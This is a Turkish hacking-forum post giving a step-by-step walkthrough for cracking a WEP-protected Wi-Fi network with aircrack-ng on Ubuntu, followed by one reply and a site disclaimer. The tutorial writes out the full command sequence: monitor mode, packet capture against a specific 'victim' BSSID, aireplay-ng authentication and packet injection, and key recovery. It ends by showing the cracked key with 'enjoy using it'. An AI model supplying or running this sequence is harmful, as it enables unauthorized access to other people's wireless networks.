Wireless Hacking

-SiPaHi-

Yaşayan Forum Efsanesi
6 Ocak 2012
12,775
1
İstanbul
WEP şifreleme tekniğini bu defa Ubuntu işletim sistemi ile hackleyelim.

Öncelikle bilgisayarınıza Wubi programını indirip kurun. Kurulum tamamlandıktan sonra bilgisayarınızı yeniden başlatın ve açılışta size soracağı seçeneklerden Ubuntu’yu seçin... ( )

Uygulamalar -> Uçbirim -> sudo apt-get install aircrack-ng yazın ve kurun..

Geri kalanını resimlerle anlatıcam.

1) sudo su komutunu uçbirime girin ve kurulumda yazdığınız şifreyi yazıp enterlayın. ( Şifre yazarken ekranda hiçbişey çıkmayacaktır, siz sadece yazın. )

*Her açtığınız uçbirimde önce bu komutu kullanın ki problem çıkmasın.

iwconfig komutu ile hack işlemini gerçekleştireceğiniz kablosuz ağ kartınızı seçeceksiniz. ( Ben Wireless USB Adaptör kullandığım için wlan1’i seçiyorum. )

1.jpg

2) ifconfig wlan1 komutundan sonra ekranda çıkan MAC adresini bir köşeye kaydediyoruz, ilerleyen komutlarda ihtiyaç duyucaz.

2.jpg

3) airmon-ng start wlan1 komutuyla wlan1 ile yapacağımız işlemleri açtık ve adını mon0 olarak otomatik atadık.

3.jpg

4) airodump-ng -c 6 mon0 komutu ile 6.kanalda wireless ağları arıyorum. Ve kurbanımızı seçtik.

4.jpg

5) Yeni bir uçbirim açıp; airodump-ng -c 6 --bssid 40:4A:03:D7:BB:56 --ivs -w bekirdursun mon0 komutu ile paket toplamaya başlıyoruz. Yani artması gereken alanımız.

#Data bölümüdür. ( MAC adresi ise kurbanın MAC’idir. )

5.jpg

6) Olayı biraz hızlandırmak lazım; yeni bir uçbirim açın aireplay-ng -1 2 -o 10 -q 10 -a 40:4A:03:D7:BB:56 -h 00:1a:ef:17:48:75 mon0 komutuyla modemle aramızda paket transferini başlatalım. ( İlk MAC kurbanın, ikincisi ise bizim wireless kartımızın MAC’i. Bununla birlikle resimdeki gibi gülücük alıyorsanız işleminiz başarılıdır. )

6.jpg

7) 6.adımda başlattığımız trafiğin meyvelerini ( paketlerini ) toplamak lazım, aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 40:4A:03:D7:BB:56 -h 00:1a:ef:17:48:75 mon0 komutu ile az önceki trafikten paketleride çekelim.. Resimde gördüğünüz gibi size soru sorduğunda y tuşuna basıp enterlamanız gerekiyor.

7.jpg

8) Benim tavsiyem 70bin paket.. Gördüğünüz gibi #Data alanım 70103 oldu ve toplama işlemini durdurmak için CTRL + Z yapıyorum.. ( Yaklaşık 10 dk sürüyor. )

8.jpg

9) aircrack-ng -a 1 bekirdursun-01.ivs komutuyla da şifre kırma işlemine geçiyoruz. Bu da yaklaşık 1 sn sürüyor =)

9.jpg

Resimde gördüğünüz; [50:58:55:57:27] şifrenin kullanılan hali: 5058555727’dir. Güle güle kullanın...

gslimami

Uzman üye
13 Mar 2010
1,193
0
İstanbul
kardeşim ben kurulumu aynen yaptım fakat açılışta bana seçenek verilmediğinden dolayı ubuntuyu seçme gibi bi faaliyet gösteremedim bi yardımcı olabilirmisin.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.